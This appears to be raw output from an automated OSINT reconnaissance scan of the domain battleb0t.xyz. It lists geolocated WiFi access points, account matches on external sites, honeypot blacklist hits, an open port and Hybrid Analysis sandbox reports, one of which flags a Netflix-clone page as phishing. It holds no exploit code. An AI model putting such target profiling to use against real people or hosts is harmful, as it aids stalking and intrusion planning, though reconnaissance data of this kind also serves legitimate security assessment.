0a:70:c1:db:70:e8:b9:50:30:b7:33:82:8e:fc:63:b0:63:ad:
97:e6:50:23:e8:d8:fd:32:74:4a:a7:58:9f:cf:c8:b6:a2:cd:
7e:28:74:19:38:ee:dc:ac:6a:d0:c4:5a:10:c7:c3:c1:0d:21:
b4:ff:86:61:30:4b:7d:10:9a:6d:10:38:4e:dc:1b:20:ad:54:
dd:8b:f9:7d:21:27:78:df:f9:73:ac:1b:f2:16:30:85:73:06:
19:38:d2:0d:2a:2f:fc:b8:ba:a6:8c:6a:bd:c8:da:cd:6a:e6:
e4:d5:b0:9f:b7:e5:07:a1:e6:c4:64:49:4e:a2:03:a3:bb:09:
77:55:6d:a7:9f:75:ea:9d:72:47:23:48:8a:7d:88:e5:aa:dd:
ab:25:4c:7b:7d:5c:a4:22:dd:53:9e:e1:3c:87:e3:cc:89:d0:
b4:6c:0c:61:00:8e:aa:db:85:6f:38:41:eb:4d:06:95:0f:0d:
4e:20:67:94:ec:1c:78:50:ed:0d:4f:1f:d7:4a:22:75:17:67:
0c:34:fe:7d:1a:30:5c:4f:39:17:f0:44:c2:e8:bd:ca:09:21:
03:9a:cb:da:b9:49:21:e4:b4:06:92:26:62:9e:1d:38:76:5b:
c4:c5:a8:a9:96:cc:aa:3e:01:a2:ae:8c:45:a0:e8:cf:2a:e0:
ca:8e:e5:18
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:66:94:73) | 50.1188, 8.6843 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.242): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mastodon-API (Category: social)<br>https://mastodon.social/api/v2/search?q=login | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Gamespot (Category: gaming)<br>https://www.gamespot.com/profile/login/ | login |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:71:0A:12:B3) | 52.3759, 4.8975 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Chess.com (Category: gaming)<br>https://www.chess.com/member/battleb0t | battleb0t |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BARWN-Public (Net ID: 00:02:6F:03:AE:69) | 37.7642, -122.3993 |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.123): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F7:8C:15) | 41.8781, -87.6298 |
| 2023-05-12 02:56:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://zacharyburdette.com/index.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_aec_IESQMMUTEX_0_331"\n "IsoScope_aec_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_aec_IE_EarlyTabStart_0xe60_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_aec_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_aec_ConnHashTable<2796>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_aec_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"\n "96.6.232.137:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar87C3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar87C1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab87C0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab87C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "DA45VJAM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DA45VJAM.txt]- [targetUID: 00000000-00002800]\n Dropped file: "YXLLLO20.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YXLLLO20.txt]- [targetUID: 00000000-00002796]\n Dropped file: "4WUOR0VH.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4WUOR0VH.txt]- [targetUID: 00000000-00002796]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_8BA7CB83-7FF8-11ED-B877-0800273CFE14_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002800]\n "~DFD0CCD659A3A95644.TMP" has type "data"- Location: [%TEMP%\\~DFD0CCD659A3A95644.TMP]- [targetUID: 00000000-00002796]\n "DA45VJAM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DA45VJAM.txt]- [targetUID: 00000000-00002800]\n "Tar87C3.tmp" has type "data"- Location: [%TEMP%\\Tar87C3.tmp]- [targetUID: 00000000-00002800]\n "Cab87C0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab87C0.tmp]- [targetUID: 00000000-00002800]\n "~DFFE2FBB3610963E2C.TMP" has type "data"- Location: [%TEMP%\\~DFFE2FBB3610963E2C.TMP]- [targetUID: 00000000-00002796]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_7ADE9AE2-7FFB-11ED-B877-0800273CFE14_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFE051EBAAF9DBCA61.TMP" has type "data"- Location: [%TEMP%\\~DFE051EBAAF9DBCA61.TMP]- [targetUID: 00000000-00002796]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002800]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002796]\n "Cab87C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab87C2.tmp]- [targetUID: 00000000-00002800]\n "YXLLLO20.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YXLLLO20.txt]- [targetUID: 00000000-00002796]\n "index_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "~DF19808A043737268F.TMP" has type "data"- Location: [%TEMP%\\~DF19808A043737268F.TMP]- [targetUID: 00000000-00002796]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002800]\n "4WUOR0VH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4WUOR0VH.txt]- [targetUID: 00000000-00002796]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 414\nContent-Type: application/octet-stream\nDate: Tue, 20 Dec 2022 00:38:53 GMT\nEtag: "bd262ffded8f9193645cf1963d01292c-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMPFG4NQP1Z3ZF5C2ANP2MND\n\n{\n "name": "Zachary Burdette",\n "short_name": "Zachary Burdette",\n "lang": "en-us",\n "theme_color": "#2962ff",\n "background_color": "#2962ff",\n "icons": [{\n "src": "img/icon-192.png",\n "sizes": "192x192",\n "type": "image/png"\n }, {\n "src": "img/icon-512.png",\n "sizes": "512x512",\n "type": "image/png"\n }],\n "display": "standalone",\n "start_url": "/?utm_source=web_app_manifest"\n}"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive"\n | 35.229.48.116 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SX55154A43F (Net ID: 00:01:E3:54:A4:3F) | 50.8897, 6.0563 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F7:35:6D) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LCPSSTAFF (Net ID: 00:0B:85:50:7F:91) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | likeevideo (Category: social)<br>https://likee.video/@login | login |
| 2023-05-12 03:11:17 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Amsterdam, North Holland, 1012, Netherlands, Europe | 188.114.96.1 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCUUID (Minecraft) (Category: gaming)<br>https://mcuuid.net/?q=ayshoo | ayshoo |
| 2023-05-12 02:53:18 | Internet Name | No | Mnemonic PassiveDNS | 25 | 0 | 1 | 0 | None | www.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.182): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:50:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wasimreja.github.io/netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9f0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2544"\n "IsoScope_9f0_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_9f0_IESQMMUTEX_0_303"\n "IsoScope_9f0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_9f0_IE_EarlyTabStart_0xb04_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_9f0_ConnHashTable<2544>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.22.52:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pro.fontawesome.com"\n "wasimreja.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFCE77C216766EB7B9.TMP" has type "data"- Location: [%TEMP%\\~DFCE77C216766EB7B9.TMP]- [targetUID: 00000000-00002544]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002544]\n "~DF3D8E8EB511650354.TMP" has type "data"- Location: [%TEMP%\\~DF3D8E8EB511650354.TMP]- [targetUID: 00000000-00002544]\n "~DFA1B02EDDB3740F24.TMP" has type "data"- Location: [%TEMP%\\~DFA1B02EDDB3740F24.TMP]- [targetUID: 00000000-00002544]\n "~DF047AF5B01B1C6397.TMP" has type "data"- Location: [%TEMP%\\~DF047AF5B01B1C6397.TMP]- [targetUID: 00000000-00002544]\n "~DF9CAF8A24CDDF2A4D.TMP" has type "data"- Location: [%TEMP%\\~DF9CAF8A24CDDF2A4D.TMP]- [targetUID: 00000000-00002544]\n "urlref_httpswasimreja.github.ionetflix-clone" has type "HTML document ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._D7A145BF-EF99-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "_7763E692-EF9A-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D7A145C1-EF99-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DFBE3414-EF99-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "T6P1ZC01.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T6P1ZC01.txt]- [targetUID: 00000000-00002544]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "WTGINOBI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WTGINOBI.txt]- [targetUID: 00000000-00002544]\n "SAL9KSU0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SAL9KSU0.txt]- [targetUID: 00000000-00002544]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "Z1J5GHXQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Z1J5GHXQ.txt]- [targetUID: 00000000-00002544]\n "SC9MWSRS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SC9MWSRS.txt]- [targetUID: 00000000-00002544]\n "9RPMKK4K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9RPMKK4K.txt]- [targetUID: 00000000-00002544]\n "31LPVZHQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\31LPVZHQ.txt]- [targetUID: 00000000-00002544]\n "netflix-clone_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://wasimreja.github.io/netflix-clone/"\n Pattern match: "https://wasimreja.github.io"\n Pattern match: "https://wasimreja.github.io/netflix-clone"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "https://pro.fontawesome.com/releases/v5.10.0/css/all.css"\n Pattern match: "SUIDmicrosoft.com/921645190899231032348364844117031032230MUID02E5F61DC6DE605D1B1AE513C75A6147microsoft.com/102558439820831110702364859742031032230_EDGE_Vmicrosoft.com/921658439820831110702364875367031032230SRCHDAF=NOFORMmicrosoft.com/1024332378944031085610"\n Pattern match: "SUIDmicrosoft.com/921645190899231032348364844117031032230MUID02E5F61DC6DE605D1B1AE513C75A6147microsoft.com/102558439820831110702364859742031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD"\n Pattern match: "SUIDmicrosoft.com/921645190899231032348364844117031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mic"\n Pattern match: "921659439820831110702365172242031032230MUID253BEC97DCC5678D3BB0FF99DD89661Dmsn.com/102559439820831110702365172242031032230"\n Pattern match: "MUIDB02E5F61DC6DE605D1B1AE513C75A6147ieonline.microsoft.com/921658439820831110702364859742031 | 185.199.108.153 |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:80 | 188.114.97.0/24 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.183): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
